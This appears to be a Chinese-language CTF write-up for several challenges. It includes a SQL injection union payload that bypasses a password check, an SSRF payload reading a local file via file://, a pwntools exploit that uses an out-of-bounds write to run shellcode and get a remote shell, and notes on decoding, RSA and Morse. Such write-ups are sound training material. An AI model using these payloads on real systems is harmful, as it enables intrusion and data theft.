控制查询返回值
下载源码,读取这存在sql注入
$query = @mysql_fetch_array(mysql_query("select pw from users where user='$user'"));
构造payload:
user='union select 'c4ca4238a0b923820dcc509a6f75849b'--+&pass=1
simplessrf
ssrf题:
利用file协议读取文件
直接用file协议读取文件
构造file://@127.0.0.1/../flag.txt
显示获取源码失败,用%23将后面注释
payload:
file://@127.0.0.1/../flag.txt%23
game
程序存在数组越界,能够通过越界实现执行我们的shellcode
通过调试可以得到exp如下:
from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
#c = process('./game')
c = remote('106.2.25.10',50005)
#gdb.attach(c,'b * 0x400855')
sc = asm(shellcraft.sh())
c.recvuntil('Divide two numbers\n')
c.sendline('9')
#c.recvuntil('You chose: %d\nEnter two numbers to do math with, e.g. [3 4]\n')
sleep(1)
c.sendline(p64(0x6010c8) + sc)
c.interactive()
cm50
根据程序中的比较逻辑,可以得到解密脚本:
# -*- coding: UTF-8 -*-
str = 'sffxl{gdv}gwfcaslydRgdoepsckaNDMSaITPNsmr1_=2cdsef66246087138'
array = [1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59,4,0]
flag = ''
for i in range(17):
idx = array[i]
flag += str[idx]
flag += chr(49)
flag += chr(48)
flag += chr(50)
flag += chr(52)
flag += chr(125)
print flag
baby
已知e N c的RSA
直接CTF-RSA-TOOL
python2 solve.py -e 3 -c
morse
直接将mp3文件拖入Audacity,可以看到摩斯电码
..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-.
解码即可。